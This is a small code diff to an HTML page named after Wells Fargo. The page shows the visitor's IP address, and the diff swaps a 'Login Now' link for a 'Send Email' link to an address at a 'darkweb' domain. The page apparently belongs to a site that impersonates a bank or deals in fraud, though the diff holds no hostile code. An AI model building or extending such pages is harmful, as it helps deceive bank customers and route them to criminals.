--- a/public/wellsfargo.html
+++ b/public/wellsfargo.html
@@ -666,9 +666,9 @@
                     <label id="label-ip"></label> <br> <p id="the-ip"></p>
                 </div>
             </div>
-            <div class="modal-body" id="first-modal" style="border-top: none !important;">
-                <a class="butn" id="settings" href="login">
-                    Login Now <img src="img/partners/user.png">
+            <div class="modal-body" id="first-modal">
+                <a class="butn" id="settings" href="mailto: email@darkweb.lat" target="_blank">
+                    Send Email <img src="img/partners/user.png">
                 </a>
             </div>
         </div>
